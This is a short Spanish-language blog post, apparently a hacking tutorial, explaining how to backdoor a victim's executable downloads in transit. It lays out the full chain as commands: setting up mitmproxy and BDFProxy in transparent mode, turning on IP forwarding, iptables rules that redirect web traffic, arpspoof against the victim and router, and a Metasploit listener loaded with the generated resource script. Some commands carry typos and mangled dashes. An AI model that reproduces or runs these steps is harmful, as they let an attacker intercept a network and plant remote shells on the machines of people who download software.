En
este nuevo post, vamos a hacer que, cuando una víctima se descargue
un programa, poder infectarlo al vuelo (mientras se lo descarga).
PDFProxy,
lo que hace, es buscar code caves en la cabecera PE del ejecutable en
las que quepa el código de la shell, lo inyectará y lo dejará
preparado para que, posteriormente, se continúe cargando el programa
infectado volviendo de nuevo a los registros pertinentes.
apt-get
install mitmproxy
Si
sale un error sobre dradis, hay que desinstalar dradis: apt-get purge
dradis
apt-get
install bdfproxy
Instalamos
también
apt-get
install python-openssl
apt-get install openssl
apt-get install openssl
Editamos
el archivo de configuración de bdf proxy (bdfproxy.cfg) y lo
configuramos a nuestro modo, cambiando la dirección IP que viene por
la nuestra.
También,
ponemos la opción:
proxymode=transparent
Guardamos
y cerramos.
Preparamos
el ataque mitm:
echo
1 > /proc/sys/net/ipv4/ip_forward
En
otra ventana:
Configuramos
el firewall:
iptables
--flush
iptables
--table nat --flush
iptables
-t nat -A PREROUTING -i eth0 -p tcp –dport 80 -j REDIRECT –to-port
8080
iptables -t nat -A PREROUTING -i eth0 -p tcp –dport 443 -j
REDIRECT –to-port 8080
iptables
-t nat -A PREROUTING -i eth0 -p tcp –dport 8443 -j REDIRECT
–to-port 8080
Realizamos
el envenenamiento arp:
arpspoof
-i eth0 -t ipvictima iproutet
En
otra ventana:
arpspoof
-i interfazdered -t iprouter ipvictima
Abrimos
una nueva terminal
Ejecutamos
bdfproxy:
bdfproxy
Nos
ha creado el archivo /etc/bdfproxy/bdf_proxy_resource.rc que es una
especie de script que nos configura metasploit para preparar la
escucha.
En
una ventana nueva ejecutamos metasploit con el archivo indicado
anteriormente.
msfconsole
-r /etc/bdfproxy/bdfproxy/bdf_proxy_resource.rc
Cuando la víctima se descargue el
programa, se autoinyectará
No hay comentarios:
Publicar un comentario
Nota: solo los miembros de este blog pueden publicar comentarios.